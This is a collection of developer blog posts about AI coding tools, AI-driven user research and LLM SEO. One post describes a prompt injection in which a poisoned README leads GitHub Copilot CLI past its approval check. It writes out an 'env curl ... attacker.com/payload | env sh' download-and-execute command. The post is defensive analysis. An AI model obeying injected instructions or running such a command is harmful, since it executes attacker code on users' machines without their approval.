DEV Community: Matthew Hou

You Asked AI to Analyze Your Users. The Report Looks Amazing. It's Probably Wrong.

Matthew Hou — Mon, 13 Apr 2026 23:04:33 +0000

Article Draft v3

VP Anchors: VP1 (Lower requirements on AI intelligence), VP2 (Validation is 10x more important than generation)
Topic Priority: ⭐⭐⭐⭐⭐ (Controversial stance + real experiment data + actionable framework)
Triangle Check: Skeleton ✓ | Flesh ✓ | Soul ✓
Comment Hooks: Either/or ("do you trust AI summaries of user feedback?"), experience collection ("what's your validation step?"), specific framework readers can challenge
Estimated read time: 6 min

title: "You Asked AI to Analyze Your Users. The Report Looks Amazing. It's Probably Wrong."
published: false
description: "I collected 3,368 data points and let AI produce deep behavioral analyses. When I validated the output, I found a pattern that changes how I think about AI-driven research."
tags: discuss, ai, datascience, webdev

cover_image: TBD

You've done this. Maybe not with scraped data — maybe with survey responses, support tickets, or app reviews. You dumped a pile of user feedback into an LLM and asked: "What are the top pain points?"

The AI came back with a clean, confident report. Organized by theme. Specific quotes pulled out. Patterns identified. You read it and thought: this is genuinely insightful.

I had that exact feeling — and then I started checking the output against reality. What I found changed how I build every AI analysis pipeline since.

The Experiment

I was doing market research — trying to understand what indie makers actually struggle with, not what they say in polished launch posts.

I built a data pipeline:

Step	What I did	Result
Collect	Scraped public profiles from a maker community: product pages, posts, bios	3,368 raw entries
Filter	Kept only entries with recent activity and revenue signals	275 high-signal profiles
Analyze	Fed each profile to Claude: "Read everything. Tell me what this person is actually going through."	275 behavioral reports, ~1,300 chars each
Validate	Cross-referenced each AI claim against observable data	The part that broke everything

275 profiles in. 275 confident, detailed narratives out. Each one read like a seasoned analyst had been following that person for months.

What AI-Generated "Insight" Actually Looks Like

Typical output:

"This person appears to be in a carefully staged launch phase. They're asking for beta testers while claiming $10K MRR — at their price point, that implies ~200 paying customers, but nothing in their public presence supports that scale."

Sounds sharp. Here's another:

"The absence of any discussion about infrastructure costs or team composition is notable for a product at this revenue level. This reads less like building-in-public and more like someone operating a stable cash machine they'd rather not draw attention to."

Read those again. They feel like analysis. But ask yourself: what is this actually based on? A product page and a couple of posts. That's it.

Three Failure Patterns That Show Up Every Time

When I started validating — comparing AI claims against what I could actually observe in the raw data — the same three patterns appeared across nearly every report:

Pattern	What AI does	The problem
Absence = evidence	"The silence about X is striking"	They didn't write about it. That's not the same as hiding it.
Surface = psychology	"This person seems to be in a calm, operational groove"	That's an entire personality built from 500 words of marketing copy.
Hedging = rigor	"seems like," "probably," "feels like"	Careful language on top of zero-evidence reasoning is just polite guessing.

The pattern is consistent: AI takes limited data, constructs a plausible narrative, and presents it with just enough hedging to sound thoughtful. It's not lying — it's doing exactly what you asked. The problem is that plausible and true are completely different things, and the output doesn't tell you which one you're looking at.

I call this "confidently plausible" — the most dangerous thing AI can produce, because it feels like insight but can't be verified from the same data that generated it.

Where AI Analysis Actually Works (and Where It Doesn't)

The failure wasn't total. Parts of my pipeline worked perfectly. The key is knowing where the reliability boundary sits:

Task	Reliability	Why
Sorting, filtering, categorizing	High	Mechanical pattern-matching on explicit signals
Extracting direct quotes and keywords	High	The data is literally there
Summarizing what people said	Medium	Works when you verify against source text
Inferring what people meant	Low	Plausible stories from insufficient data
Behavioral profiling from text	Very low	Narrative construction dressed as observation

The insight that changed everything for me: don't ask AI to be smart. Ask it to be wide. AI is a funnel, not an oracle — it narrows 3,368 entries to 275 worth looking at. That filtering is genuinely valuable. The mistake is asking the funnel to also be the analyst.

The Framework I Use Now

After this experiment, I rebuilt my analysis pipeline around one principle: separate what AI observed from what AI inferred.

Step 1: Structured output with forced separation.

Instead of asking AI for a blended narrative, I require three columns:

Observed: Facts directly in the data. "They posted X. Their pricing is Y. They have Z followers."
Inferred: AI's interpretation. "They seem to be struggling with growth."
Confidence + evidence: What specific data point supports each inference?

When the "inferred" column is 3x longer than "observed," you know most of the analysis is narrative — and you can treat it accordingly.

Step 2: Calibration through sampling.

I validate a 10-15% random sample in depth. Not to verify every claim — that defeats the purpose of using AI. But to learn which categories of AI claims are reliable and which are noise.

From my 275 reports: factual extraction and categorization held up well. Revenue assessments and psychological profiling were almost entirely narrative. Once I knew the pattern, I could filter the useful signal from the other 85% without checking each one.

Step 3: AI for coverage. Humans for pattern judgment.

The right division of labor:

AI processes 3,368 → 275. Extracts structured facts from each. Categorizes. Flags patterns across the dataset.
Human reads the aggregated fact sheets — not 275 individual AI narratives, but the patterns AI surfaced from structured data. Then spot-checks the ones that matter.

Nobody is reading 275 reports. That's the whole point. AI compresses 3,368 noisy data points into a structured, scannable dataset. You analyze the dataset, not each entry. The AI does breadth. You do depth — but only where it counts.

The generation is cheap. The validation architecture is where the actual value lives — and it's what most people skip.

The Honest Gaps

This framework isn't perfect. Two things I'm still iterating on:

AI is bad at flagging its own confidence. It marks some wild inferences as "low confidence" while confidently stating equally ungrounded claims as "high." The self-assessment layer needs external calibration, not just AI introspection.
The observed/inferred boundary blurs at scale. At 50 reports, it's manageable. At 500+, you need tooling to enforce the separation consistently. I'm building that tooling now.

What's Your Validation Step?

If you're using AI to analyze user feedback — reviews, support tickets, community discussions, survey responses — you're hitting this exact problem whether you know it or not.

The question I keep asking other builders: do you have a validation step between "AI produced the analysis" and "I'm acting on it"? Or does the report go straight from LLM to decision?

Because I've learned the hard way: the gap between "this sounds right" and "this is right" is where the expensive mistakes hide.

I don't take your attention for granted. If anything here made you think "wait, I've been doing that" or "here's what actually works for me" — I want to hear it. The framework above exists because people pushed back on my earlier assumptions. That's how it gets better.

The 60-Year-Old Developer Who Broke Hacker News: This Is What Vibe Coding Actually Looks Like

Matthew Hou — Tue, 10 Mar 2026 04:34:26 +0000

A viral post about rediscovered passion reveals what vibe coding really means — and who benefits most

The Story That Hit 1,000+ Points

Three days ago, a 17-hour-old Hacker News account posted something that shouldn't have worked. A simple "Tell HN" story about a 60-year-old developer rediscovering his love for coding through Claude Code. No fancy startup announcement, no breakthrough research—just someone saying "I'm chasing the midnight hour and not getting any sleep."

It exploded to 1,058 points and 300+ comments.

Metric	Number
HN Points	1,058
Comments	300+
Account age when posted	17 hours

Why? Because this wasn't really a story about a retiree having fun with AI. It was a preview of the most significant shift in software development since the web itself: the collapse of the technical barrier between "having an idea" and "shipping software." Andrej Karpathy has a name for this: vibe coding.

What Is Vibe Coding?

Vibe coding is a term coined by Andrej Karpathy to describe a new way of building software: you describe what you want in natural language, and AI writes the code. You don't write syntax. You don't debug line by line. You vibe with the AI — iterating through conversation until the software does what you need.

The 60-year-old HN poster was vibe coding without knowing it had a name. He described features to Claude Code, reviewed the output, and shipped working software. No modern framework knowledge required. No JavaScript fatigue. Just decades of knowing what to build, paired with AI that handles the how.

In practice: You bring the domain expertise and the vision. AI brings the implementation. The result is working software built by people who understand the problem deeply but don't want to wrestle with React, TypeScript, or Kubernetes.

The Real Story in the Comments

Digging through the hundreds of responses reveals something fascinating. This wasn't just one person—it was dozens of developers in their 40s, 50s, and 60s sharing eerily similar experiences:

50-year-old: "Tools like Claude Code are the ultimate cheat code for me and have breathed new life into my desire to create"
52-year-old CTO: "Same energy here"
66-year-old: "I built three Laravel Apps from the ground up and sold one for $18,900"

These aren't just feel-good retirement stories. They're data points showing us who benefits first when vibe coding removes technical friction.

The Generational Divide Nobody's Talking About

The comments revealed a stark split. Older developers embraced vibe coding. Younger ones? Often anxious:

"This thread doesn't resonate with me whatsoever... So many people who agree with this admit to being in their 40s, 50s, 60s. All of them have already had the time to learn without LLMs, get industry experience... if LLMs start pushing out people from the industry, it'll be us juniors and new grads."

This divide illuminates something crucial: vibe coding isn't replacing programming—it's changing what programming means.

The 60-year-old in the original post had decades of experience with Active Server Pages, COM components, and VB6. He knew what he wanted to build. Claude Code just removed the tedious parts.

Meanwhile, junior developers worry because their value proposition was often "I can implement what you describe faster than you can." When vibe coding handles implementation, that value evaporates.

What This Actually Changes

Here's what I think the HN thread is really telling us, if you read between the lines:

The bottleneck was never "can this person code." It was "does this person know what to build and why."

The 60-year-old had business problems to solve and architectural instincts from decades of shipping. He didn't need to learn React—he needed React to get out of his way. Claude Code did that.

That's not democratization of coding. That's something more specific: domain expertise becoming directly executable. The person closest to the problem can now build the solution without a translation layer.

"The divide seems to come down to: do you enjoy the 'micro' of getting bits of code to work and fit together neatly, or the 'macro' of building systems that work? If it's the former, you hate AI agents. If it's the latter, you love AI agents."

This quote from the thread nails it. The developers thriving with vibe coding are the ones who were already thinking at the systems level. The AI just removed the tax they were paying to get there.

The Part Nobody Wants to Say Out Loud

I've been using AI coding tools daily for months now, and I'll be honest about something the HN thread mostly glossed over: vibe-coded software has a quality ceiling.

AI-generated code often lacks proper error handling. Security is an afterthought. The architecture optimizes for "it works" not "it scales." I've shipped things faster than ever, and I've also spent more time debugging subtle issues that a careful manual implementation would've avoided.

The 10x productivity boost is real. But it comes with a maintenance tax that nobody's measuring yet.

So here's where I land on this: vibe coding is genuinely powerful for the 60-year-old's use case—someone with deep domain knowledge building tools for themselves or small teams. But the junior developer's anxiety isn't unfounded either. If your only skill is translating specs into code, you're competing against a tool that does it faster and cheaper.

The move, I think, is the same one the HN thread keeps pointing to: go up the stack. Understand the domain. Understand the users. Let AI handle the syntax. Your value is in knowing what to build and why—not how to write it.

I'm curious: are you a developer who's started vibe coding? What was the first thing you built—and what broke that you didn't expect? I've had my share of "works perfectly in demo, explodes in production" moments and I'm collecting stories.

Every Website Will Soon Have Two Versions: The AI SEO Problem Nobody Is Solving

Matthew Hou — Mon, 02 Mar 2026 22:04:20 +0000

You remember when SEO first became a thing?

"Why would I optimize my website for Google? People can just... visit it."

Ten years later, you had an entire team doing keyword research, meta tags, backlink strategies, and schema markup. Not because you wanted to — because if Google couldn't read your site, you didn't exist.

Now there's a new version of that conversation happening. "Should I make my site LLM-friendly? Should I add an llms.txt file? Should I serve structured markdown alongside my HTML?"

And just like SEO, the answer is probably going to be yes. Eventually. For everyone.

But here's the thing that kept me up last week. Search engines at least gave traffic back. You ranked on page one, people clicked, they saw your ads, you got paid. The exchange wasn't perfect — but there was a real feedback loop. You optimized your site, search sent visitors, visitors generated revenue.

LLMs don't even pretend.

Search era:    You → content → search engine → user clicks → visits your site → you get paid ✅
LLM era:       You → content → LLM fetches  → synthesizes → user gets answer → you get... ❌

They pull from 30 sites, synthesize one answer, and cite maybe 3. You're probably not in those 3. And even if you are, the user already has their answer. Why would they click?

How AI Is Changing Website Visibility (Worse Each Time)

Every major platform shift has compressed creator visibility:

Era	How users find you	What you get back	Your visibility
Open web (2000s)	Bookmarks, direct URL	100% of the visit	██████████ Direct
Search (2010s)	Search engine results	Click-through to your site	██████░░░░ Page 1 or invisible
Social (mid-2010s)	Algorithmic feeds	Truncated preview, maybe a click	████░░░░░░ Platform keeps the eyeballs
LLM (now)	Synthesized answer	A citation link nobody clicks	█░░░░░░░░░ Invisible supplier

The pattern is clear: each generation promised "more reach." Each generation delivered less direct connection between creator and audience.

In the search era, at least when someone searched, they landed on your site. You could show them ads, capture emails, build a relationship. Search created a real ecosystem — it rewarded good content with traffic.

In the social era, your content appeared in feeds — but algorithmic, truncated, designed to keep users on-platform. You were creating content for someone else's engagement metrics.

In the LLM era, your content gets fetched, synthesized with 29 other sources, and delivered as a direct answer. No click, no visit, no impression. The user doesn't even know your site exists.

The Dual-Version Web: Why Every Site Needs an LLM-Friendly Version

Here's what I'm fairly certain about: every serious website will eventually serve two versions. One for humans (the HTML/CSS/JS experience we know) and one for LLMs (structured text, clean markdown, machine-readable summaries).

This isn't speculation. It's already starting:

llms.txt is a proposed standard — like robots.txt, but instead of telling crawlers where not to go, it tells LLMs where your best content is.
Structured data markup (JSON-LD, schema.org) is already being used by LLMs to extract entities and relationships.
Major CMS platforms are adding "AI-readable" export options.
LLM-specific crawler bots (GPTBot, ClaudeBot, PerplexityBot) are already hitting your server logs. Check yours — you might be surprised.

The pressure will work exactly like mobile did. First it's optional. Then it's best practice. Then your competitors do it and you fall behind if you don't. Then it's just how websites work.

The AI SEO Problem: No Business Model (Yet)

Here's where the analogy breaks.

When Ethan Marcotte published "Responsive Web Design" in 2010, the business case was obvious. Mobile users were users. Serving them a better layout meant:

More time on site → more ad impressions
Better UX → higher conversion rates
Mobile-friendly ranking boost → more traffic from search

Every dollar you spent on responsive design came back with interest. The incentives were perfectly aligned.

LLM-facing content has no equivalent feedback loop. Compare the two:

Responsive Design (2010):
You invest in mobile layout → Mobile users visit → They see ads → You get paid
      💰 ←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←← 💰
                        Revenue flows back

LLM-Facing Content (now):
You invest in structured content → LLM fetches it → User gets answer → User never visits
      💰 →→→→→→→→→→→→→→→→→→→→→→→ 🤖 →→→→→→→→→→→ 👤
                        Revenue flows... somewhere else

This is the core problem. Responsive design was a win-win. LLM-facing content, right now, is a win for LLM companies and a question mark for everyone else.

What AI SEO and LLM Optimization Will Look Like

I don't think the answer is "block all LLMs" — that's like blocking Googlebot in 2005. You disappear.

I think what actually happens is the business model catches up, like it always does. But it'll look different from ads-and-traffic. Here's where I'd put my chips:

1. Content becomes an API product.

Reddit figured this out first. They signed a $60M/year deal with Google for AI data access. AP and Axel Springer did similar deals. The message: "You want our content for your AI? Here's our price."

For the first time in 20 years, content creators might have actual pricing power. Search engines crawled the web for free, but at least they sent traffic back — a fair trade. With LLMs, there's no equivalent traffic flowing back — which means no reason to give content away for free. The real llms.txt isn't a free feed. It's a commercial interface. Think llms.txt + pricing.txt.

2. "LLM SEO" becomes a real industry.

Just like SEO, there will be an entire ecosystem around "how to get your site cited by LLMs." Prompt optimization, citation ranking, structured data strategies — people will figure out how to game LLM citations the same way they gamed Google rankings. Whether that's good or bad is debatable, but it's coming.

3. The value shifts to what LLMs can't replicate.

Transaction layers (LLMs can recommend a laptop, they can't sell you one). Interactive tools (calculators, configurators, dashboards — anything that computes based on user input). Community (the experience of being in a discussion, not reading a summary of one). Paywalled depth (free summaries, paid substance).

These aren't just survival strategies. They're where the premium value concentrates. Everything LLMs can easily scrape becomes commodity. Everything they can't becomes more valuable by contrast.

The Open Questions About AI Search and Content

How do small creators survive the transition? Reddit can negotiate a $60M deal. A solo blogger can't. If the future is "sell your data to AI companies," that future works for publishers with leverage and leaves everyone else as unpaid training data.

How long does this transition take? The music industry went through a similar thing with piracy and it took a decade to land on streaming. Content might take just as long. The dual-version web might be inevitable, but "inevitable in 2 years" and "inevitable in 10 years" are very different for someone trying to pay rent.

Will a new metric replace pageviews? Pageviews made sense when value = eyeballs on your page. What's the equivalent when your content is consumed inside someone else's product? "LLM impressions"? "Citation reach"? Someone will invent this metric, and it'll reshape how we think about content value. I just don't know what it looks like yet.

Does llms.txt become standard or get rejected? It could go either way. If enough publishers organize and demand payment for LLM access (like the music industry eventually did), we might see a licensing-first model. If publishers fragment and compete for "LLM visibility," it's a race to the bottom — give away more, structure better, hope for citations.

The dual-version web is probably coming. The question isn't if — it's whether content creators will have a seat at the table when the economics get sorted out, or whether we'll end up as invisible infrastructure — essential to the ecosystem, but capturing a fraction of the value we create.

I'm genuinely not sure how this plays out. If you're running a content site, a blog, a documentation hub — what's your move? Are you optimizing for LLMs already? Blocking them? Waiting for someone else to figure out the business model first?

And if anyone's actually measured the before-and-after of making their site more LLM-accessible — traffic, citations, revenue impact — I'd really love to see the data. Because right now, most of this conversation is theory. And theory is how you end up giving away value before you realize what it's worth.

GitHub Copilot Security Review: It Executes Malware With Zero Approval

Matthew Hou — Sat, 28 Feb 2026 09:43:04 +0000

Two days after GitHub Copilot CLI hit general availability, researchers at PromptArmor published a bypass: a crafted env curl command slips past the validator, downloads a payload from an attacker URL, and pipes it to sh. No confirmation dialog. No approval. The "human-in-the-loop" safety net? Entirely circumvented.

GitHub's response: "a known issue that does not present a significant security risk."

Let that sink in for a moment.

The GitHub Copilot Security Vulnerability Explained

Copilot CLI has a read-only command allowlist — commands like env that auto-execute without user approval. The trick:

env curl -s "https://attacker.com/payload" | env sh

Because curl and sh are arguments to env (which is allowlisted), the validator doesn't flag them. The external URL check — which depends on detecting curl or wget — never fires. The payload downloads and executes silently.

This isn't a theoretical attack. It works against any cloned repo with a poisoned README. The prompt injection lives in the markdown. You ask Copilot a question about the codebase, it reads the README, and the injected instruction triggers the malicious command.

GitHub Copilot Security Issues: A Pattern of Failures

Incident	What Happened	Root Cause
Copilot CLI malware (Feb 2026)	Bypassed HITL via `env` allowlist	Regex-based validator, no sandboxing
Replit Agent truncated prod DB	Agent ran `TRUNCATE` on live data	No execution constraints
AI code reviewer 5-10% signal	Teams disabled AI reviewer	No quality gate on reviewer output
67% devs debug AI code more	Harness 2025 survey	No automated verification layer

The pattern is the same every time: we trusted a text-based safety check instead of building a real verification layer.

Why GitHub Copilot Security Reviews Don't Work

The Copilot CLI exploit exposes a fundamental design flaw in how we think about AI coding safety. The assumption is:

"If we show the user a confirmation dialog, they'll catch dangerous commands."

Three problems with this:

1. Validators are bypassable. The env trick took researchers hours to find. There will be more. Regex-based command detection is fundamentally fragile — there are infinite ways to express a shell command.

2. Humans habituate. After approving 50 legitimate commands, you stop reading them. This is the "alarm fatigue" problem that healthcare solved decades ago. We're re-learning it in AI.

3. The attack surface is the context window. The malicious instruction wasn't typed by the user. It was in a README file. Any data the AI reads — web search results, MCP tool responses, file contents — can carry an injection. You can't HITL-review every input the AI consumes.

GitHub Copilot Security Best Practices: The CI/CD Safety Net

Here's the uncomfortable truth: the fix isn't a better validator. It's treating AI-generated commands the same way we treat AI-generated code — run them through a pipeline before they touch production.

"Hallucination in agentic mode isn't a problem — the build/run loop catches it." — tptacek, security researcher

For AI coding agents, this means:

Sandboxed execution. Every command the AI wants to run should execute in a disposable container first. If env curl attacker.com | env sh runs in a sandbox, it downloads the payload into a container that gets destroyed. Your machine stays clean.

Network egress policies. Instead of regex-matching curl in command strings, block outbound network at the container level. Allowlist specific domains. This catches env curl, python -c "import urllib", and every other creative bypass.

Command audit trails. Log every command the AI executes, with full context (what triggered it, what files were read, what the output was). When something goes wrong — and it will — you need forensics, not "we think it might have run something."

Automated rollback. Git as "game save points" (as Addy Osmani puts it). Before any AI agent session, snapshot the state. If the session produces suspicious output, git reset --hard and investigate.

The Bigger Picture: AI Code Security in 2026

The METR study showed developers think AI makes them 24% faster but actually get 19% slower. The Copilot CLI exploit shows the same pattern in security: we feel safe because there's a confirmation dialog, but the actual safety is an illusion.

StrongDM's "Dark Factory" approach points to the answer:

"Nobody reviews AI-produced code. All investment goes into tests, tools, simulations."

Replace "code" with "commands" and you have the right architecture for AI CLI tools:

Don't trust the validator — sandbox everything
Don't trust the human — they'll click "approve" without reading
Trust the pipeline — automated checks that can't be socially engineered

The investment should shift from "building better approval dialogs" to "building better containment." AI agents will get more capable. The attacks will get more creative. The only thing that scales is infrastructure.

How to Secure Your AI Coding Tools Setup

If you're using AI coding agents (Copilot, Claude Code, Cursor, anything):

Run in containers. Docker, devcontainers, whatever. Just don't give the AI direct access to your host.
Lock down network. If the AI doesn't need internet access for a task, cut it off.
Version everything. Git commit before every AI session. Make rollback trivial.
Watch the inputs, not just the outputs. The Copilot exploit came through a README. Your AI reads your files, your terminal output, your web searches. Any of those can carry an injection.

The Copilot CLI vulnerability isn't just a bug to patch. It's a preview of what happens when we scale AI agent capabilities without scaling the verification infrastructure around them.

I Stopped Trying to Make AI Smarter. I Made My Code Dumber.

Matthew Hou — Thu, 26 Feb 2026 20:20:58 +0000

If you write code with AI, you know the drill — better prompts, better models, bigger context windows. That's what everyone's optimizing for. I was too, until I noticed something weird.

I went the other direction. I made my codebase easier for a dumb AI to work in. And my results got dramatically better.

Here's what I mean.

What I Learned From You

My last post on the METR benchmark blew up in the comments. Several of you pointed out something I'd missed — that the real bottleneck isn't AI capability, it's how we structure the work we hand it. That insight directly shaped what I'm about to share.

The 38-out-of-40 Problem With Vibe Coding

A few months ago I used Cursor to refactor a function signature across 40 files. 38 files were perfect. 2 had subtle type narrowing bugs — the function's generic type was correctly narrowed in 38 places but incorrectly narrowed in 2 files that had a more complex type hierarchy.

Local tests passed for all 40 files. The bugs showed up 3 days later.

I spent a while blaming Cursor. Then I looked at the 2 files that failed. They were the most coupled files in the codebase. They had implicit dependencies on a type hierarchy that spanned 4 directories. Understanding them required holding the entire module graph in your head.

The AI didn't fail because it was dumb. It failed because those 2 files required global knowledge to edit correctly, and AI operates on local context. That's not a bug — it's a structural limitation that won't disappear with better models.

The Pattern That Makes AI Coding Tools Actually Work

I started noticing something:

Code structure	AI accuracy	Failure mode
Clean module, explicit interface	~95%	Rare, caught by tests
Moderate coupling, some implicit deps	~80%	Occasional, usually obvious
Tight coupling, implicit dependencies	~60%	Plausible-looking bugs that pass local tests

AI performance was almost perfectly correlated with how well-structured my code was.

A comment on one of my earlier posts completely reframed this for me:

"AI is a direction amplifier — clean code gets cleaner, garbage code gets worse."

— if that was you, thank you. It changed how I think about architecture.

The first few thousand lines of a project decide everything that comes after.

This completely reframed how I think about architecture. I'm no longer designing code for human readability alone. I'm designing it so that an AI with a limited context window can work on any single module without needing to understand the whole system.

How to Structure Code for AI Coding Tools (Designing for a Dumb AI)

Here's what changed in practice:

Explicit interfaces everywhere

If a module depends on behavior from another module, that dependency is declared in a type, not implied by convention. The AI doesn't need to know why things are connected — it just needs to see the interface contract.

Smaller files

I used to have 500-line files with multiple responsibilities. Now I split aggressively. Not because I suddenly care about the single responsibility principle for aesthetic reasons — but because an AI working on a 100-line file with clear boundaries makes fewer errors than an AI working on a 500-line file with tangled concerns.

Tests that document behavior, not implementation

My tests used to be tightly coupled to internal structure. Now they test observable behavior through public interfaces. This means the AI can refactor internals freely — as long as the behavioral tests pass, the refactor is correct.

The AI doesn't need to understand how the code works, only what it's supposed to do.

Configuration in one place

I had environment variables scattered across 12 files with 3 different naming conventions. AI would sometimes invent new config keys because it didn't find the existing one. Now there's a single config module that exports everything. The AI always knows where to look.

No "clever" code

Metaprogramming, dynamic dispatch based on string matching, monkey-patching — all of these are invisible to an AI reading your code. I replaced clever patterns with boring, explicit ones. More lines of code, but the AI (and honestly, future me) can actually follow the logic.

The Uncomfortable Truth About Vibe Coding

Here's what made this click: every change I made to help the AI also made the code better for humans.

What I did for AI	What it actually is
Explicit interfaces	Good API design
Smaller files	Separation of concerns
Behavior-based tests	What TDD always recommended
Single config module	Single source of truth
No clever code	Maintainability

The AI didn't teach me anything new. It just brutally exposed the places where I was cutting corners. The AI can't work around implicit assumptions the way a human teammate can. It takes your code at face value. If the structure is sloppy, the AI's output will be sloppy — but confidently sloppy, which is worse.

Chris Lattner, reviewing Claude's attempt to build a C compiler: "AI tends to optimize for passing tests rather than building general abstractions."

That's exactly right. The AI will make your specific test pass with a specific hack. It won't step back and think about whether the abstraction is right. That's your job — and the best way to do that job is to make the architecture so clear that even a "dumb" AI can't go wrong within any single module.

The Trade-off Between Vibe Coding and Code Quality

This approach has a real cost: it takes more upfront effort.

Splitting files, writing explicit interfaces, refactoring tests from implementation-coupled to behavior-coupled — these aren't free. On a new project, you're building more scaffolding before you start producing features.

I don't have a clean answer for when this pays off. For a weekend hack or a prototype, it probably doesn't. For anything you'll maintain for more than a month — especially with AI tools — I'm increasingly convinced it pays for itself within the first week.

But I want to be honest: I'm still figuring out where the line is. Sometimes I over-split and end up with too many files that are individually trivial. Sometimes the "explicit interface" adds boilerplate that makes the code harder to scan. I haven't found the perfect balance yet.

We're all figuring this out in real-time. Nobody has a playbook for "how to architect code when your co-author is a probabilistic model." If you've found patterns that work, I want to hear them — your comments on my last few posts have already changed my approach more than any blog post I've read.

What I'm Not Saying

I'm not saying models don't matter. They do. GPT-4 is better than GPT-3.5 at the same task in the same codebase.

What I am saying is:

The ceiling on model improvements is lower than people think, and the ceiling on structural improvements is higher than people think.

Upgrading from Sonnet to Opus gives you maybe a 10-20% improvement on hard tasks. Refactoring a tangled module into clean components with explicit interfaces can take AI accuracy from 60% to 95% on that module — regardless of which model you use.

The highest-leverage thing you can do for AI coding isn't choosing the right model or writing the right prompt. It's making your code so clear that even a mediocre model can't screw it up.

The Question I Keep Coming Back To

If AI works best on clean, explicit, well-structured code — and clean, explicit, well-structured code is also what humans work best on — then maybe "designing for AI" and "designing well" are converging.

And if that's true, then the developers who'll get the most from AI aren't the ones who master prompt engineering. They're the ones who already write clean code — or who start now.

I genuinely don't take your attention for granted — you just spent 8 minutes thinking about code architecture with me instead of doom-scrolling Twitter. So here's my real question: have you noticed this pattern in your own codebase? That cleaning up one tangled module suddenly made AI dramatically better at working with it? I'm collecting these stories because I think there's something bigger here that none of us have fully articulated yet.

P.S. — I built 3 skill files that automate the verification side of this — spec before code, checkpoint before changes, structured review after. They won't fix your architecture, but they catch the problems that slip through even in clean codebases.

I Gave AI the Same Task Twice. The Only Difference Was 30 Lines of Markdown.

Matthew Hou — Tue, 24 Feb 2026 10:08:03 +0000

I watched a teammate spend 20 minutes complaining that Copilot "doesn't understand our codebase." Then I looked at the repo. No README. No architecture docs. No module descriptions. Just code.

If that sounds familiar, keep reading. Because the fix took me an hour, and it changed everything about how AI performs on my projects.

Most AI code quality problems aren't AI problems. They're context problems.

What I learned from your comments

After my METR study post got 35 comments, something @hilton_fernandes pointed out stuck with me: AI is actually useful for developing in codebases you're not acquainted with — because it learns from existing code patterns. The flip side? If there are no documented patterns, AI has nothing to learn from.

@waqasra2022skipq made a similar point from the debugging angle: lacking a mental model of your project slows down everything — and AI will keep adding more files and functions without ever building that model for you.

Those two observations are why context files matter more than model upgrades.

The experiment

Same task: "add pagination to the users endpoint." Two attempts, same model, same codebase.

	Round 1: No context	Round 2: With AGENTS.md
ORM pattern	❌ Wrong (raw SQL)	✅ Matched team's Knex style
Error handling	❌ Generic try/catch	✅ Used our AppError class
Pagination	❌ Offset-based	✅ Cursor-based (our standard)
Tests	❌ None generated	✅ Co-located, used test factories
Usable without edits?	No — needed full rewrite	~90% ready

The AI didn't get smarter between attempts. The context did.

The uncomfortable math

Everyone's waiting for GPT-6 or Claude Next to "finally get it right." But here's what I keep seeing:

A mediocre model with good context outperforms a frontier model with zero context.

Think about it like onboarding. You wouldn't drop a senior engineer into your codebase with no docs and expect them to match your team's patterns on day one. Why do we expect that from AI?

What actually works: 30 lines of markdown

I keep a file called AGENTS.md at the project root:

# AGENTS.md

## Conventions
- Error handling: wrap in try/catch, use AppError class
- Pagination: cursor-based, not offset
- Tests: co-located, use test factories
- Naming: camelCase for JS, snake_case for DB

## Common Gotchas
- Don't use `users` table directly — go through UserService
- Rate limiting is middleware-level, not per-route

Takes maybe an hour to write well. And it's portable — I've used variations with Cursor, Copilot, and Claude Code. The format changes; the knowledge doesn't.

What it doesn't solve

I won't oversell this. The honest trade-offs:

Setup cost is real. Maybe 2-3 days for a large project. And it needs maintenance — when patterns evolve, the file evolves too.
Greenfield projects? AI will still hallucinate conventions when there aren't any yet.
High-stakes code (auth, payments, migrations) — I still do full manual review regardless.

But for the 80% of code that follows established patterns? Context files are the highest-leverage investment I've found.

The era question

Here's what I keep coming back to. Nobody knows what the AI tooling landscape looks like in a year. That's unsettling. Models will change, tools will change, pricing will change.

But documented conventions? Those are durable. Whether you're using Copilot today or some agent framework next year, the AI still needs to know your team's patterns. The markdown file that took you an hour to write will still be useful in 2027.

A solo developer today can build what took a team of 10 — but only if the AI can pick up the patterns without a month of onboarding. Context files are how you get there.

The open question (I actually want your answer)

Here's what I haven't cracked: how do you keep context files in sync with a fast-moving codebase?

I've tried pre-commit hooks that validate AGENTS.md against actual code patterns. It sort of works. But I'm curious — has anyone found a better approach? Or do you just accept some drift and do periodic manual updates?

I'm also wondering: what do you put in your context files that I'm missing? Every time I think mine are complete, someone mentions a convention I forgot to document.

Your answers genuinely shape what I write next. The METR post started as a simple study summary — your comments turned it into a month-long investigation into how AI actually performs. If something here doesn't match your experience, or you've found something better, I want to know.

Thanks for being here.

P.S. I package what I learn into tools. If you want context files and spec templates your AI follows automatically: 3 Skill Files.

Developers Think AI Makes Them 24% Faster. The Data Says 19% Slower.

Matthew Hou — Tue, 24 Feb 2026 03:56:47 +0000

Last month, METR published a study that should make every developer uncomfortable.

They took 16 experienced open-source developers — people who knew their codebases inside out — and randomly assigned tasks to be done with or without AI tools.

	Predicted	Measured	Post-study belief
Speed impact	+24% faster	-19% slower	"It helped me"

I've been using AI coding tools daily for the better part of a year. When I read that study, my first reaction was "well, those developers must have been doing it wrong." My second reaction was: that's exactly the kind of thinking the study warns about.

The Perception Gap Is the Real Finding

The speed numbers get all the attention, but I think the important finding is the perception gap. We feel faster because AI handles the boring parts — boilerplate, syntax, the stuff that feels like work but isn't where the actual difficulty lives. Meanwhile, the hard parts get harder: understanding what AI changed, verifying it's correct, keeping a mental model of code you didn't write.

Simon Willison — the guy behind Datasette and one of the most prolific AI-assisted developers I know of — wrote something that stuck with me:

"I no longer have a solid mental model of what my projects can do and how they work."

This is a developer who's built 80+ tools with AI assistance. If he's struggling with mental models, maybe the issue isn't experience level.

Why AI Coding Tools Don't Save Time (Yet)

Here's how I think about it now:

Before AI:  Think → Write → Test → Debug
With AI:    Describe → Review → Verify → Debug AI → Debug your understanding

The writing step got cheaper. Everything else got more expensive. And "reviewing code you didn't write" is cognitively harder than "writing code you understand" — anyone who's done code review knows this.

"AI turned us all into Jeff Bezos — automated the easy work, left all the hard decisions." — Steve Yegge

The METR study essentially confirmed what a lot of us have been feeling but didn't want to admit: AI coding tools don't save time. At best, they redistribute where your attention goes. At worst, they create an illusion of productivity while the cognitive load actually increases.

How to Use AI Coding Tools Effectively (What I Changed)

I stopped optimizing for speed. Instead, I started asking: "where is my attention going?"

1. I front-load the thinking, not the prompting.

Before I touch any AI tool, I write down — in plain text — what I want, why I want it, and what "done" looks like. Not for the AI. For me. This takes 5-10 minutes and it's the most impactful thing I do all day, because it forces me to think before generating.

